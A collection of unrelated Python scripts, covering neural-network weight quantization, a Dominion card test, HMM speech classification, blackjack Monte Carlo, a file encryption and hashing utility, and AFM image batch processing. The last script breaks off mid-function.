#quantize the weights at these indexes
self.weightFrozen.data.flatten()[idxsFreeze] = self.inqQuantize(self.weight.data.flatten()[idxsFreeze], quantLevels)
def inqAssembleWeight(self, module=None):
#with nn.DataParallel, the module is copied, so self.module cannot be used
weight, weightFrozen = self.getWeightParams(module)
weightFrozen = weightFrozen.detach()
frozen = ~torch.isnan(weightFrozen)
weightAssembled = torch.zeros_like(weightFrozen)
weightAssembled[frozen] = weightFrozen[frozen]
fullPrecSelector = torch.isnan(weightFrozen).float()
tmp = fullPrecSelector*weight
weightAssembled = weightAssembled + tmp
return weightAssembled
def rescaleWeights(self):
self.weight.data.mul_((self.s/2)/self.weight.data.abs().mean().item())
class INQLinear(nn.Linear):
def __init__(self, in_features, out_features, bias=True,
numLevels=3, strategy="magnitude", quantInitMethod=None):
super().__init__(in_features, out_features, bias)
self.weightInqCtrl = INQParameterController(self, 'weight',
numLevels, strategy,
quantInitMethod=quantInitMethod)
def step(self, fraction):
self.weightInqCtrl.inqStep(fraction)
def forward(self, input):
weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)
return nn.functional.linear(input, weightAssembled, self.bias)
class INQConv1d(nn.Conv1d):
def __init__(self, in_channels, out_channels, kernel_size,
stride=1, padding=0, dilation=1, groups=1,
bias=True, padding_mode='zeros',
numLevels=3, strategy="magnitude", quantInitMethod=None):
super().__init__(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups,
bias, padding_mode)
self.weightInqCtrl = INQParameterController(self, 'weight',
numLevels, strategy,
quantInitMethod=quantInitMethod)
def step(self, fraction):
self.weightInqCtrl.inqStep(fraction)
def forward(self, input):
weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[0] + 1) // 2, self.padding[0] // 2)
return nn.functional.conv1d(
nn.functional.pad(input, expanded_padding, mode='circular'),
weightAssembled, self.bias, self.stride,
(0,), self.dilation, self.groups)
return nn.functional.conv1d(input, weightAssembled, self.bias, self.stride,
self.padding, self.dilation, self.groups)
class INQConv2d(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size,
stride=1, padding=0, dilation=1, groups=1,
bias=True, padding_mode='zeros',
numLevels=3, strategy="magnitude", quantInitMethod=None):
super().__init__(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups,
bias, padding_mode)
self.weightInqCtrl = INQParameterController(self, 'weight',
numLevels, strategy,
quantInitMethod=quantInitMethod)
def step(self, fraction):
self.weightInqCtrl.inqStep(fraction)
def forward(self, input):
weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2,
(self.padding[0] + 1) // 2, self.padding[0] // 2)
return nn.functional.conv2d(nn.functional.pad(input, expanded_padding, mode='circular'),
weightAssembled, self.bias, self.stride,
(0,), self.dilation, self.groups)
return nn.functional.conv2d(input, weightAssembled, self.bias, self.stride,
self.padding, self.dilation, self.groups)
if __name__ == '__main__':
x = torch.linspace(-2,2,100)
numLevels = 3
s = torch.max(torch.abs(x)).item()
n_1 = math.floor(math.log((4*s)/3, 2))
n_2 = int(n_1 + 2 - (numLevels//2))
quantLevelsPos = (2**i for i in range(n_2, n_1+1))
quantLevelsNeg = (-2**i for i in range(n_2, n_1+1))
quantLevels = itertools.chain(quantLevelsPos, [0], quantLevelsNeg)
x_q = INQParameterController.inqQuantize(x, quantLevels)
import matplotlib.pyplot as plt
plt.clf()
plt.plot(x.numpy())
plt.plot(x_q.numpy())
model = INQLinear(2, 3, bias=False,
numLevels=numLevels, strategy="RPR")
print(model.weight)
print(model.weightFrozen)
model.step(0.5)
print(model.weight)
print(model.weightFrozen)
x = torch.randn(4,2)
y = model(x)
L = y.norm(p=2)
L.backward()
|
#!/usr/bin/env python
import unittest
from dominion import Game, Card, Piles
import dominion.Card as Card
###############################################################################
class Card_Fortuneteller(Card.Card):
def __init__(self):
Card.Card.__init__(self)
self.cardtype = [Card.CardType.ACTION, Card.CardType.ATTACK]
self.base = Card.CardExpansion.CORNUCOPIA
self.desc = """2 Coin. Each other player reveals cards from the top of his deck
until he reveals a Victory or Curse card. He puts it on top and discards the other revealed cards."""
self.name = "Fortune Teller"
self.coin = 2
self.cost = 3
def special(self, game, player):
for plr in player.attack_victims():
while True:
card = plr.next_card()
plr.reveal_card(card)
if not card:
break
if card.isVictory() or card.name == "Curse":
plr.add_card(card, "topdeck")
plr.output("%s's Fortune Teller put %s on top of your deck" % (player.name, card.name))
break
plr.output("%s's Fortune Teller discarded your %s" % (player.name, card.name))
plr.discard_card(card)
###############################################################################
class Test_Fortuneteller(unittest.TestCase):
def setUp(self):
self.g = Game.TestGame(numplayers=2, initcards=["Fortune Teller"])
self.g.start_game()
self.plr, self.vic = self.g.player_list()
self.card = self.g["Fortune Teller"].remove()
self.plr.add_card(self.card, Piles.HAND)
def test_play(self):
"""Fortune Teller"""
self.vic.piles[Piles.DECK].set("Duchy", "Silver", "Copper")
self.plr.play_card(self.card)
self.assertEqual(self.plr.coins.get(), 2)
self.assertIn("Silver", self.vic.piles[Piles.DISCARD])
self.assertIn("Copper", self.vic.piles[Piles.DISCARD])
self.assertEqual(self.vic.piles[Piles.DECK][-1].name, "Duchy")
###############################################################################
if __name__ == "__main__": # pragma: no cover
unittest.main()
# EOF
|
import json
import plyvel
def make_db():
try:
# 存在しない場合作成,存在する場合エラー
db = plyvel.DB('./db_knock63/', create_if_missing=True, error_if_exists=True)
for line in open('artist.json', 'r'):
artist_dic = json.loads(line)
if {'name', 'tags'}.issubset(set(artist_dic.keys())):
db.put(artist_dic['name'].encode('utf-8'), json.dumps(artist_dic['tags']).encode('utf-8'))
db.close()
except:
pass
def search_tags(name: str) -> str:
db = plyvel.DB('./db_knock63/')
try:
tags = json.loads(db.get(name.encode('utf-8')))
except TypeError:
tags = 'The artist name is not registered.'
db.close()
return tags
def main():
make_db()
while True:
input_text = input('Please enter an artist name. (quit command: "q")\nartist name: ')
if input_text == 'q':
break
else:
tags = search_tags(input_text)
print(f'tags : {tags}')
print('-' * 100)
if __name__ == '__main__':
main()
|
import unittest
from gp_framework import report as rep
class TestReportModule(unittest.TestCase):
def test_transpose_list_of_lists(self):
input_list = [['a', 'b', 'c', 'd', 'e'], ['f', 'g', 'h', 'i', 'j'], ['k', 'l', 'm', 'n', 'o']]
expected_output = [['a', 'f', 'k'], ['b', 'g', 'l'], ['c', 'h', 'm'], ['d', 'i', 'n'], ['e', 'j', 'o']]
actual_output = rep._transpose_list_of_lists(input_list)
self.assertEqual(actual_output, expected_output)
def test_combine_list_elements_group_size_2(self):
input_list = [i*2 for i in range(10)]
expected_output = [1, 5, 9, 13, 17]
actual_output = rep._combine_list_elements(input_list, 2)
self.assertEqual(actual_output, expected_output)
def test_combine_list_elements_group_size_3(self):
input_list = [i for i in range(10)]
expected_output = [1, 4, 7, 9]
actual_output = rep._combine_list_elements(input_list, 3)
self.assertEqual(actual_output, expected_output)
if __name__ == '__main__':
unittest.main()
|
import numpy as np
from get_mfc_data import get_mfc_data
from GaussianHMM import GaussianHMM
if __name__ == "__main__":
#datas = get_mfc_data('C:/Users/18341/Desktop/book/听觉/实验3-语音识别/语料/features/')
datas = get_mfc_data('F:/HIT/大三上/视听觉/lab3/组/gzx_sound_mfcc/')
# 每个类别创建一个hmm, 并用kmeans,viterbi初始化hmm
hmms = dict()
for category in datas:
Qs = datas[category]
n_hidden = 5
n_dim = Qs[0].shape[1]
hmm = GaussianHMM(n_hidden,n_dim)
hmm.kmeans_init(Qs[:-3])
hmm.viterbi_init(Qs) #
hmms[category] = hmm
#print(len(Qs))
#print(len(Qs[0]))
#print(len(Qs[1]))
# 训练每个hmm
print('start fit')
for category in hmms:
hmm = hmms[category]
#print(hmm.covs)
Qs = datas[category]
hmm.fit(Qs[:-3], iter_max = 5)
hmms[category] = hmm
print(category, ':fit success')
# 测试, 打印得分和最终正确率
correct_num = 0
for real_category in datas:
for test_sample in datas[real_category][-3:]:
print('real_category:', real_category)
max_score = -1 * np.inf
predict_category = -1
for test_category in hmms:
hmm = hmms[test_category]
score = hmm.generate_prob(test_sample)
print('test category ', test_category, '\'s score: ', score)
if score > max_score:
max_score = score
predict_category = test_category
if predict_category == real_category:
correct_num += 1
print('predict_category:',predict_category)
print(correct_num / (3*5))
#输出参数
'''
print("params:\n")
print(hmms['1'].initial_prob)
print(hmms['1'].transition_prob)
print('-------------')
print(hmms['2'].initial_prob)
print(hmms['2'].transition_prob)
print('-------------')
print(hmms['3'].initial_prob)
print(hmms['3'].transition_prob)
print('-------------')
print(hmms['4'].initial_prob)
print(hmms['4'].transition_prob)
print('-------------')
print(hmms['5'].initial_prob)
print(hmms['5'].transition_prob)
'''
|
import gym
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from collections import defaultdict
from collections import Counter
ACTION_HIT = 1
ACTION_STAND = 0
NUM_EPISODES = 500000
def main():
plt.style.use('ggplot')
env = gym.make('Blackjack-v0')
value_table = first_visit_monte_carlo_prediction(env, sample_policy)
_, axes = plt.subplots(nrows=2, figsize=(5, 8), subplot_kw={'projection': '3d'})
axes[0].set_title('value function with ace as 1')
axes[1].set_title('value function with ace as 11')
plot_blackjack(value_table, axes)
def first_visit_monte_carlo_prediction(env, policy):
# http://incompleteideas.net/book/bookdraft2018jan1.pdf
# Richard Sutton, Andrew Barto
# RL: An Introduction
# Section 5.1
# This differs from 'Hands-On RL with Python' Sudharsan Ravichandaran
# He uses an incremental update based on V' = V + (r - V)/n
# This follows from formula for adding one more number to an average of n-1 numbers.
value_table = defaultdict(float)
returns = defaultdict(list)
for _ in range(NUM_EPISODES):
observations, _, rewards = generate_episode(env, policy)
sum_of_rewards = 0
# Iterate backwards so that we can get the sum of rewards
# after the first occurrence of observation.
# (as described in Sutton and Barto)
for step_index, observation in reversed(list(enumerate(observations))):
sum_of_rewards += rewards[step_index]
# If this is the first time we have seen this observation,
# update the value table.
# This makes it 'first visit Monte Carlo'
if observation not in observations[:step_index]:
returns[observation].append(sum_of_rewards)
value_table[observation] = np.mean(returns[observation])
return value_table
def generate_episode(env, policy):
observations = []
actions = []
rewards = []
observation = env.reset()
done = False
while not done:
# Note we keep the first observation,
# but don't store the last observation.
# Consistent with S_0, A_0, R_1
observations.append(observation)
action = policy(observation)
actions.append(action)
observation, reward, done, _ = env.step(action)
rewards.append(reward)
return observations, actions, rewards
def sample_policy(observation):
player_score, _, _ = observation
return ACTION_STAND if player_score >= 20 else ACTION_HIT
def plot_blackjack(value_table, axes):
player_sum = np.arange(12, 21 + 1)
dealer_show = np.arange(1, 10 + 1)
ace_as_11 = np.array([False, True])
state_values = np.zeros((len(player_sum), len(dealer_show), len(ace_as_11)))
for i, player in enumerate(player_sum):
for j, dealer in enumerate(dealer_show):
for k, ace in enumerate(ace_as_11):
state_values[i, j, k] = value_table[player, dealer, ace]
X, Y = np.meshgrid(player_sum, dealer_show)
axes[0].plot_wireframe(X, Y, state_values[:, :, 0])
axes[1].plot_wireframe(X, Y, state_values[:, :, 1])
for axis in axes:
axis.set_zlim(-1, 1)
axis.set_ylabel('player sum')
axis.set_xlabel('dealer showing')
axis.set_zlabel('state-value')
plt.show()
if __name__ == "__main__": main() |
#!/usr/bin/env python3
# Author: Carlijn Assen
import pickle
import sys
import numpy as np
def tfidf(w1, w2):
docs = pickle.load(open('docs.pickle', 'rb'))
all_tweets = 0
tf_idf_scores = {}
for item in docs:
all_tweets += 1
words = docs[item][2].split()
tweet_len = len(words)
term_in_document2 = 0
try:
if w1 in words:
term_in_document += 1
w_occ = words.count(w1)
tf = w_occ/tweet_len
df = term_in_document/all_tweets
idf = np.log(all_tweets/df)
tf_idf = tf * idf
else:
tf_idf = 1
if w2 in words:
term_in_document2 += 1
w_occ2 = words.count(w2)
tf2 = w_occ2/tweet_len
df2 = term_in_document2/all_tweets
idf2 = np.log(all_tweets/df2)
tf_idf2 = tf2 * idf2
else:
tf_idf2 = 1
except KeyError:
print('try another query', file=sys.stderr)
tf_idf_scores[all_tweets] = [tf_idf, tf_idf2]
for k,v in tf_idf_scores:
print(k,v)
print(tfidf('hallo', 'ik'))
|
from collections.abc import Callable
from typing import Any
__version__: str
def dumps(__obj: Any, default: Callable[[Any], Any] | None = ..., option: int | None = ...) -> bytes: ...
def loads(__obj: bytes | str) -> Any: ...
class JSONDecodeError(ValueError): ...
class JSONEncodeError(TypeError): ...
OPT_APPEND_NEWLINE: int
OPT_INDENT_2: int
OPT_NAIVE_UTC: int
OPT_NON_STR_KEYS: int
OPT_OMIT_MICROSECONDS: int
OPT_PASSTHROUGH_DATACLASS: int
OPT_PASSTHROUGH_DATETIME: int
OPT_PASSTHROUGH_SUBCLASS: int
OPT_SERIALIZE_DATACLASS: int
OPT_SERIALIZE_NUMPY: int
OPT_SERIALIZE_UUID: int
OPT_SORT_KEYS: int
OPT_STRICT_INTEGER: int
OPT_UTC_Z: int
|
def unique_in_order(iterable):
iterable_list = list(iterable)
unique_list = []
if len(iterable_list) == 0:
return []
else:
unique_list.append(iterable_list[0])
for i in range(0, len(iterable_list)):
if i != 0 and iterable_list[i] != unique_list[-1]:
unique_list.append(iterable_list[i])
return unique_list
print(unique_in_order('AAAABBBCCDAABBB'))
print(unique_in_order('ABBCcADAA'))
print(unique_in_order([1,2,2,3,3]))
print(unique_in_order('A'))
print(unique_in_order('AAA'))
|
class User:
"""
Attribute is a variable associated with the object of class.
@attributes:
self.name
self.age
self.work
methods are functions defined in the class
Constructor is a method which is also called as initializing an object.
The way we create a constructor is using def __init__() method
Attributes are the things the object has and the methods are the things the objects does
"""
def __init__(self, name, age, work):
self.name = name
self.age = age
self.work = work
self.followers = 0
self.following = 0
def print_user_details(self):
print("Your name is {}, your age is {} and you are a {} professional. You have {} followers"
.format(self.name, self.age, self.work, self.followers))
def follow(self, user):
user.followers += 1
self.following += 1
deep = User("Deepanshu", 28, "IT")
rajat = User("Rajat", 26, "Business")
deep.follow(user=rajat)
deep.print_user_details()
rajat.print_user_details()
|
balance = 4213
annualInterestRate = 0.2
monthlyPaymentRate = 0.04
totalPaid = 0
for num in range(1, 13): # For 12 months
monthlyPayment = round((balance) * (monthlyPaymentRate),2)
newbalance = round((balance) - monthlyPayment,2)
balanceAndinterest = round(((newbalance) + ((annualInterestRate * (newbalance))/12)),2)
totalPaid += round(monthlyPayment, 2)
print 'Month: ' + str(num)
print 'Minimum monthly payment: ' + str(monthlyPayment)
print 'Remaining balance: ' + str(balanceAndinterest)
balance = balanceAndinterest
print 'Total paid: ' + str(totalPaid)
print 'Remaining balance: ' + str(balanceAndinterest) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 5 10:07:32 2020
@author: dean
"""
import xarray as xr
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
ds = xr.open_dataset('ci_sim_data_m=40.nc')
#params = ds['params'].attrs
cis = ds['cis']
r2ers = cis.coords['r2er']
cis_vals = cis.values
cis_vals[cis_vals>1] = 1
cis_vals[cis_vals<0] = 0
cis[...] = cis_vals
cis = cis[...,:,:]
in_ci = ((cis.sel(ci='ll')<=r2ers)*(cis.sel(ci='ul')>=r2ers)*(cis.sel(ci='ll')!=1)*(cis.sel(ci='ll')!=1)*(cis.sel(ci='ul')!=0))
ms = in_ci.mean('exp')
n_exps = len(in_ci.coords['exp'])
ses = np.sqrt(ms*(1-ms)/n_exps)
s = in_ci.sum('exp')
ps = np.zeros(s.shape)
for i in range(s.shape[0]):
for j in range(s.shape[1]):
p = stats.binom_test(s[i,j], n_exps, p=0.8)
ps[i,j] = p
to_hi = ((cis.sel(ci='ll')>r2ers)+(cis.sel(ci='ll')==1)).sum('exp')
to_lo = ((cis.sel(ci='ul')<r2ers)+(cis.sel(ci='ul')==0)).sum('exp')
ps_uneven = np.zeros(s.shape)
for i in range(s.shape[0]):
for j in range(s.shape[1]):
p = stats.binom_test([to_hi[i,j], to_lo[i,j]], n_exps, p=0.5)
ps_uneven[i,j] = p
rej = ps<(0.01/(np.product(s.shape)))
rej_uneven = ps_uneven<(0.01/(np.product(s.shape)))
colors = ['c', 'r', 'g', 'orange']
for i in range(4):
#plt.errorbar(r2ers, ms[:,i], yerr=ses[:,i], color=colors[i])
plt.errorbar(r2ers, ms[:,i],color=colors[i])
plt.legend(['Non-parametric bootstrap', 'Parametric bootstrap', 'bca','Hybrid bayes'])
for i in range(4):
plt.scatter(r2ers[rej[:,i]], -0.05 + (ms)[:,i][rej[:,i]], marker='*', edgecolors=colors[i], facecolors='none')
plt.scatter(r2ers[rej_uneven[:,i]], 0.05+(ms)[:,i][rej_uneven[:,i]], edgecolors=colors[i], facecolors=colors[i])
plt.ylabel('Fraction CI contain true ${r}^2_{ER}$')
plt.xlabel(r'${r}^2_{ER}$')
plt.grid()
plt.tight_layout()
plt.savefig('ci_sim_npbs_pbs_hb_m=40.pdf')
#%%
plt.figure(figsize=(10,3))
sub_samp = 10
r2er_ind = 3
r2er = r2ers[r2er_ind]
yticks = np.linspace(0,1,5)
plt.subplot(131)
r2_er = r2ers[r2er_ind]
cis[0, r2er_ind, ::sub_samp, 0].plot()
cis[0, r2er_ind, ::sub_samp, 1].plot()
plt.ylim(0,1.1)
plt.plot([0,3000], [r2er,r2er])
plt.ylabel(r'${r}^2_{ER}$')
plt.xlabel('simulation')
plt.legend(['lower CI', 'upper CI', 'True $r^2_{ER}$'])
plt.title('Non parametric\nbootstrap')
plt.gca().set_xticklabels([])
plt.subplot(132)
cis[1, r2er_ind, ::sub_samp, 0].plot()
cis[1, r2er_ind, ::sub_samp, 1].plot()
plt.title('')
plt.ylim(0,1.1)
plt.plot([0,3000], [r2er,r2er])
plt.gca().set_yticklabels([])
plt.gca().set_xticklabels([])
plt.ylabel('')
plt.xlabel('')
plt.title('Parametric\nbootstrap')
plt.subplot(133)
cis[2, r2er_ind, ::sub_samp, 0].plot()
cis[2, r2er_ind, ::sub_samp, 1].plot()
plt.ylim(0,1.1)
plt.plot([0,3000], [r2er,r2er])
plt.gca().set_yticklabels([])
plt.gca().set_xticklabels([])
plt.ylabel('')
plt.xlabel('')
plt.title('Hybrid bayes')
plt.tight_layout()
plt.savefig('ci_sim_npbs_pbs_hb_m=40_example_sim.pdf')
#%%
cis[2, r2er_ind, ::sub_samp, 0].plot()
cis[2, r2er_ind, ::sub_samp, 1].plot()
plt.plot([0,500], [r2er,r2er])
#%%
to_hi = ((cis.sel(ci='ll')>r2ers)+(cis.sel(ci='ll')==1)).sum('exp')
to_lo = ((cis.sel(ci='ul')<r2ers)+(cis.sel(ci='ul')==0)).sum('exp')
ps_uneven = np.zeros(s.shape)
for i in range(s.shape[0]):
for j in range(s.shape[1]):
p = stats.binom_test([to_hi[i,j], to_lo[i,j]], n_exps, p=0.5)
ps_uneven[i,j] = p
#%%
in_ci = ((cis.sel(ci='ll')<=r2ers)*(cis.sel(ci='ul')>=r2ers)).mean('exp')
print(in_ci)
in_ci = ((cis.sel(ci='ll')<=r2ers)*(cis.sel(ci='ul')>=r2ers)*(cis.sel(ci='ll')!=1)
*(cis.sel(ci='ll')!=1)*(cis.sel(ci='ul')!=0)).mean('exp')
print(in_ci)
#%%
print((cis.sel(r2er=0, ci='ul')==0).mean('exp'))
print((cis.sel(r2er=0, ci='ll')>0).mean('exp')) |
n, m = map(int,input().split())
p = []
s = []
for _ in range(m):
temp = input().split()
p.append(int(temp[0]))
s.append(temp[1])
ac = 0
# penaは配列にして各問題について数える
# acを出さなかった問題についてはペナ数をカウントしないから?
pena = [0]*n
flag = [False]*n
# 普通にこんがらがった
for pe, se in zip(p, s):
if se == "AC":
flag[pe-1] = True
else:
if flag[pe-1] is False:
pena[pe-1] += 1
psum = 0
for i in range(n):
if flag[i]:
ac += 1
psum += pena[i]
print(ac, psum) |
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Cipher import DES
import hashlib
from Crypto.Cipher import ARC4
from Crypto.Cipher import Blowfish
class Aes():
def __init__(self,fil):
while(True):
self.key=input("ENTER THE KEY : ").strip()
self.file=fil
self.file_name=self.file.split("\\")[-1]
self.file_name=self.file_name.split(".")
self.file_name=self.file_name[0]+"_encrypted."+self.file_name[1]
print(self.file_name)
if(len(self.key)!=16):
print("Key length should be 16")
else:
break
def encrypt(self):
self.crypt_AES=AES.new(self.key,AES.MODE_ECB)
content = []
with open(self.file, "r") as fil:
content += fil.readlines()
for ind in range(len(content)):
if (len(content[ind]) % 16 != 0):
while (True):
if (len(content[ind]) % 16 == 0):
break
else:
content[ind] += " "
self.hex_content=[]
for cont in content:
self.crypt_AES_msg=""
self.hex_content.append(str(self.crypt_AES.encrypt(cont).hex()))
with open(self.file_name,"w") as fil:
fil.write(" ".join(self.hex_content))
'''self.plain_content=[]
for cont in self.hex_content:
cont=bytes.fromhex(cont)
self.plain_content.append(self.crypt_AES.decrypt(cont).decode('ascii'))
print(self.hex_content)
print(self.plain_content)
with open("r.txt", "w") as f:
for c in self.plain_content:
c = c[:c.index("\n")] + c[c.index("\n"):].replace(" ", "")
f.write(c)'''
return (" ".join(self.hex_content))
class Des():
def __init__(self,fil):
while(True):
self.key=input("ENTER THE KEY : ").strip()
self.file=fil
self.file_name=self.file.split("\\")[-1]
self.file_name=self.file_name.split(".")
self.file_name=self.file_name[0]+"_encrypted."+self.file_name[1]
print(self.file_name)
if(len(self.key)%8!=0):
print("Key length should be multiple of 8")
else:
break
def encrypt(self):
self.crypt_DES = DES.new(self.key, DES.MODE_ECB)
content = []
with open(self.file, "r") as fil:
content += fil.readlines()
for ind in range(len(content)):
if (len(content[ind]) % 8 != 0):
while (True):
if (len(content[ind]) % 8 == 0):
break
else:
content[ind] += " "
self.hex_content = []
for cont in content:
self.crypt_DES_msg = ""
self.hex_content.append(str(self.crypt_DES.encrypt(cont).hex()))
with open(self.file_name, "w") as fil:
fil.write(" ".join(self.hex_content))
'''self.plain_content=[]
for cont in self.hex_content:
cont=bytes.fromhex(cont)
self.plain_content.append(self.crypt_AES.decrypt(cont).decode('ascii'))
print(self.hex_content)
print(self.plain_content)
with open("r.txt", "w") as f:
for c in self.plain_content:
c = c[:c.index("\n")] + c[c.index("\n"):].replace(" ", "")
f.write(c)'''
return (" ".join(self.hex_content))
class RC4():
def __init__(self,fil):
while(True):
self.key=input("ENTER THE KEY : ").strip()
self.file=fil
self.file_name=self.file.split("\\")[-1]
self.file_name=self.file_name.split(".")
self.file_name=self.file_name[0]+"_encrypted."+self.file_name[1]
print(self.file_name)
if(len(self.key)%8!=0):
print("Key length should be multiple of 8")
else:
break
def encrypt(self):
self.crypt_RC4 = ARC4.new(self.key)
content = []
with open(self.file, "r") as fil:
content += fil.readlines()
for ind in range(len(content)):
if (len(content[ind]) % 8 != 0):
while (True):
if (len(content[ind]) % 8 == 0):
break
else:
content[ind] += " "
self.hex_content = []
for cont in content:
self.crypt_RC4_msg = ""
self.hex_content.append(str(self.crypt_RC4.encrypt(cont).hex()))
with open(self.file_name, "w") as fil:
fil.write(" ".join(self.hex_content))
'''self.plain_content=[]
for cont in self.hex_content:
cont=bytes.fromhex(cont)
self.plain_content.append(self.crypt_AES.decrypt(cont).decode('ascii'))
print(self.hex_content)
print(self.plain_content)
with open("r.txt", "w") as f:
for c in self.plain_content:
c = c[:c.index("\n")] + c[c.index("\n"):].replace(" ", "")
f.write(c)'''
return (" ".join(self.hex_content))
class BLOWFISH():
def __init__(self,fil):
while(True):
self.key=input("ENTER THE KEY : ").strip()
self.file=fil
self.file_name=self.file.split("\\")[-1]
self.file_name=self.file_name.split(".")
self.file_name=self.file_name[0]+"_encrypted."+self.file_name[1]
print(self.file_name)
if(len(self.key)%8!=0):
print("Key length should be multiple of 8")
else:
break
def encrypt(self):
self.crypt_BLOWFISH = Blowfish.new(self.key)
content = []
with open(self.file, "r") as fil:
content += fil.readlines()
for ind in range(len(content)):
if (len(content[ind]) % 8 != 0):
while (True):
if (len(content[ind]) % 8 == 0):
break
else:
content[ind] += " "
self.hex_content = []
for cont in content:
self.crypt_BLOWFISH_msg = ""
self.hex_content.append(str(self.crypt_BLOWFISH.encrypt(cont).hex()))
with open(self.file_name, "w") as fil:
fil.write(" ".join(self.hex_content))
'''self.plain_content=[]
for cont in self.hex_content:
cont=bytes.fromhex(cont)
self.plain_content.append(self.crypt_AES.decrypt(cont).decode('ascii'))
print(self.hex_content)
print(self.plain_content)
with open("r.txt", "w") as f:
for c in self.plain_content:
c = c[:c.index("\n")] + c[c.index("\n"):].replace(" ", "")
f.write(c)'''
return (" ".join(self.hex_content))
mode=input("ENTER HASH OR ENCRYPTION : ").strip()
if(mode=="E"):
while(True):
type=input("ENTER THE TYPE OF ENCRYPTION YOU WANT TO MAKE : ").strip()
if(type=="AES"):
fil = input("Enter the Name of the file : ")
cipher_Aes=Aes(fil)
cipher_Aes.encrypt()
break
elif(type=="DES"):
fil = input("Enter the Name of the file : ")
cipher_Des=Des(fil)
cipher_Des.encrypt()
break
elif (type == "RC4"):
fil = input("Enter the Name of the file : ")
cipher_Rc4 = RC4(fil)
cipher_Rc4.encrypt()
break
elif (type == "BLOWFISH"):
fil = input("Enter the Name of the file : ")
cipher_Blowfish = BLOWFISH(fil)
cipher_Blowfish.encrypt()
break
else:
print("Enter AES or DES or RC4 or BLOWFISH")
elif(mode=="H"):
fil=input("Enter the name of the file").strip()
h_type=input("Enter the hash type preffered : ")
if(h_type=="md5"):print(hashlib.md5(open(fil,"rb").read()).hexdigest())
elif(h_type=="blake2s"):print(hashlib.blake2s(open(fil,"rb").read()).hexdigest())
elif (h_type == "blake2b"):print(hashlib.blake2b(open(fil, "rb").read()).hexdigest())
elif (h_type == "sha1"):print(hashlib.sha1(open(fil, "rb").read()).hexdigest())
elif (h_type == "sha256"):print(hashlib.sha256(open(fil, "rb").read()).hexdigest())
elif (h_type == "sha224"):print(hashlib.sha224(open(fil, "rb").read()).hexdigest())
elif (h_type == "sha384"):print(hashlib.sha384(open(fil, "rb").read()).hexdigest())
elif (h_type == "sha3_384"):print(hashlib.sha3_384(open(fil, "rb").read()).hexdigest())
elif (h_type == "sha3_256"):print(hashlib.sha3_256(open(fil, "rb").read()).hexdigest())
elif (h_type == "sha3_224"):print(hashlib.sha3_224(open(fil, "rb").read()).hexdigest())
else:
print("input should be H or E")
'''from Crypto.Cipher import AES
key = 'abcdefghijklmnop'
cipher = AES.new(key, AES.MODE_ECB)
msg = cipher.encrypt('TechTutorialsX!!TechTutorialsX!!')
print(type(msg))
print(msg.hex())
decipher = AES.new(key, AES.MODE_ECB)
print(decipher.decrypt(msg))'''
'''content=[]
with open("requirements.txt","r") as fil:
content+=fil.readlines()
for ind in range(len(content)):
if(len(content[ind])%16!=0):
while(True):
if(len(content[ind])%16==0):break
else:content[ind]+=" "
print(content)
with open("r.txt","w") as f:
for c in content:
c=c[:c.index("\n")]+c[c.index("\n"):].replace(" ","")
f.write(c)
print(content)''' |
import gwyutils, gwy, gc
from copy import deepcopy
from os import listdir, mkdir, getcwd
from os.path import isfile, join, isdir
import os, datetime
import re, shutil, imp
import numpy as np
if not '/home/june/.gwyddion/pygwy/custlib' in sys.path:
sys.path.append('/home/june/.gwyddion/pygwy/custlib')
import Fct_gwyfunctions as custgwy
imp.reload(custgwy)
#ratio for color range
ratio = (0.05, 0.99)
pngexp = '/home/june/AFMImages'
cwd = '/home/june/RawAFMImages'
root = '/home/june/RawAFMImages'
def runbatch(root, cwd, pdr, pngexp, ratio):
print(cwd)
# Export PNG with scalebar
s = gwy.gwy_app_settings_get()
s['/module/pixmap/title_type'] = 0
s['/module/pixmap/ztype'] = 0
s['/module/pixmap/xytype'] = 0
s['/module/pixmap/draw_maskkey'] = False
# ... (*lots* of possible settings, see ~/.gwyddion/settings)
Files_To_Open = [ f for f in listdir(cwd) if isfile(join(cwd,f)) ]
print(Files_To_Open)
if len(Files_To_Open) == 0:
return 'No files'
try:
mkdir(join(cwd,'Processed'))
except Exception as sym:
print ('Already Exist')
Tobe_Saved = join(cwd, 'Processed')
filename_save = cwd.split('/')[-1]
print (Files_To_Open)
#Load first file to use as Merged file
for filename in Files_To_Open:
if not filename[-3:][-1].isdigit():
Files_To_Open.remove(filename)
continue
print(filename)
try:
Temp = gwy.gwy_file_load(join(cwd,filename), RUN_NONINTERACTIVE)
print(type(Temp))
if type(Temp) == gwy.Container :
print('right type')
Cont_Dest = Temp
Files_To_Open.remove(filename)
Fstfilename = filename
break
Files_To_Open.remove(filename)
print('loadedbutnot')
except Exception as sym:
print('except')
print ("not proper file"+str(sym)+"\n")
continue
#Add into current browser and Make Visible on display
try:
gwy.gwy_app_data_browser_add(Cont_Dest)
except Exception as ex:
print(ex.args)
return 'no veeco files to load'
Cont_Dest.set_boolean_by_name('/0/data/visible', 1)
print (Files_To_Open)
#File Merge
#First Container
DataFields = gwyutils.get_data_fields_dir(Cont_Dest)
for key in DataFields.keys():
title = Cont_Dest.get_string_by_name(key+"/title")
if (title == 'Amplitude') : Cont_Dest.remove_by_prefix('/'+key.split('/')[1]+'/')
Cont_Dest.set_string_by_name(key+'/title', title+'.'+Fstfilename)
#Rest of Containers
print ('Rest of Files',Files_To_Open)
for filename in Files_To_Open :
if not filename[-3:][-1].isdigit():
Files_To_Open.remove(filename)
continue
#print (orgfile, join(cwd,filename))
try:
Temp_Source = gwy.gwy_file_load(join(cwd,filename), RUN_NONINTERACTIVE)
if type(Temp_Source) == gwy.Container:
Cont_Source = Temp_Source
pass
else:
continue
except Exception as sym:
print ("not proper file"+sym+"\n")
continue
DataFields = gwyutils.get_data_fields_dir(Cont_Source)
for key in DataFields.keys():
ID = key.split('/')[1]
title = Cont_Source.get_string_by_name(key+"/title")
if (title == 'Height') :
